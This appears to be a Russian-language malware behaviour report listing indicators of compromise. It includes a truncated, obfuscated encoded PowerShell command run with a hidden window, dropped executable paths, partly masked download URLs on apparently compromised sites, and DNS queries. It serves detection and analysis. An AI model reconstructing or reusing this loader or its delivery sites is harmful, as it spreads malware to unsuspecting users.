Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAHQALQBWAGEAcgBJAGEAYgBMAEUAIAAgACgAIgBVAFIAIgArACIAagBXACIAKQAgACgAIABbAFQAeQBQAEUAXQAoACIAewA1AH0AewAyAH0AewAwAH0AewAzAH0AewA2AH0AewAxAH0AewA0AH0AIgAtAEYAJwBPACcALA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
- %TEMP%\1062772.cvr
- %HOMEPATH%\uayueb7\aa7eyf4\fnhxhs8h.exe
- %HOMEPATH%\uayueb7\aa7eyf4\fnhxhs8h.exe
- http://www.ho#####eraldresort.com/sys-cache/Z/
- http://ci#####monsparking.com/patc-transmission/Kya/
- http://te###enia.com/cgi-bin/Ayx3/
- http://lu##.#m-host.net/wp-content/plugins/o714-badx-66007/l8in/
- http://su###niq.net/susconiq.net/JFXG/
- http://su###niq.net/wp-admin/setup-config.php
- DNS ASK ho#####eraldresort.com
- DNS ASK ci#####monsparking.com
- DNS ASK ka###ele.com
- DNS ASK te###enia.com
- DNS ASK lu##.#m-host.net
- DNS ASK su###niq.net
- DNS ASK hi####tionery.com
- DNS ASK ht#####etherapy.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAHQALQBWAGEAcgBJAGEAYgBMAEUAIAAgACgAIgBVAFIAIgArACIAagBXACIAKQAgACgAIABbAFQAeQBQAEUAXQAoACIAewA1AH0AewAyAH0AewAwAH0AewAzAH0AewA2AH0AewAxAH0AewA0AH0AIgAtAEYAJwBPACcALA...' (со скрытым окном)